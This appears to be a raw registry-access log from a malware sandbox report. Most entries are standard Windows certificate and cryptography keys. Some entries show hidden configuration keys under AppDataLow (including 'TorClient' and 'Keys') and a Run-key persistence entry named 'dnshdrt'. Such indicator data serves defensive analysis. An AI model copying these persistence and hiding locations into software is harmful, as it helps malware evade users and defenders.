HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Disallowed
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\ProtectedRoots
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\ProtectedRoots\Certificates
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Root\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\AuthRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\85371CA6E550143DCE2803471BDE3A09E8F8770F
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\85371CA6E550143DCE2803471BDE3A09E8F8770F\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Root\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\SmartCardRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPeople\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPeople
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\TrustedPeople\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\TrustedPeople
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\CTLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\trust\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\trust
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\trust
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\trust\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\trust
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Diagnostics
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserenvDebugLevel
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\UrlDllGetObjectUrl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\UrlDllGetObjectUrl
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\AuthRoot
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllImportPublicKeyInfoEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllImportPublicKeyInfoEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllConvertPublicKeyInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllConvertPublicKeyInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllVerifyCertificateChainPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllVerifyCertificateChainPolicy
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\Escalation
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\WMR
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\79B55E88
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\WinHttpSettings
HKEY_LOCAL_MACHINE\Software\Microsoft\Ole
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaximumAllowedAllocationSize
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-0c-29-dc-04-c0
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableInetUnknownAuth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllVerifyEncodedSignature
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllVerifyEncodedSignature
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllImportPublicKeyInfoEx2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllImportPublicKeyInfoEx2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllEncodeObjectEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.4
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Scr
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\{8E20961D-952E-F0AE-8FA2-992433F6DD98}
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Keys
\xe4\xa4\x90\xe2\xbc\x80
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\TorClient
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSPDY3_0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses
HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\InfoTip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\LdapClientIntegrity
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseOldHostResolutionOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseHostnameAsAlias
DisableUserModeCallbackFilter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Client
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Ini
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Temp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\p2pcollab.dll,-8042
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\qagentrt.dll,-10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagMatchAnyMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableMandatoryBasicConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableCANameConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableUnsupportedCriticalExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlCountInCert
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCountPerChain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCertCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\CryptnetPreFetchTriggerPeriodSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableWeakSignatureFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\ChainCacheResyncFiletime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\109F1CAED645BB78B3EA2B94C0697C740733031C\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D559A586669B08F46A30A133F8A9ED3D038E2EA8\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\FEE449EE0E3965A5246F000E87FDE2A065FD89D4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs\A377D1B1C0538833035211F4083D00FECC414DAB\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6\Blob
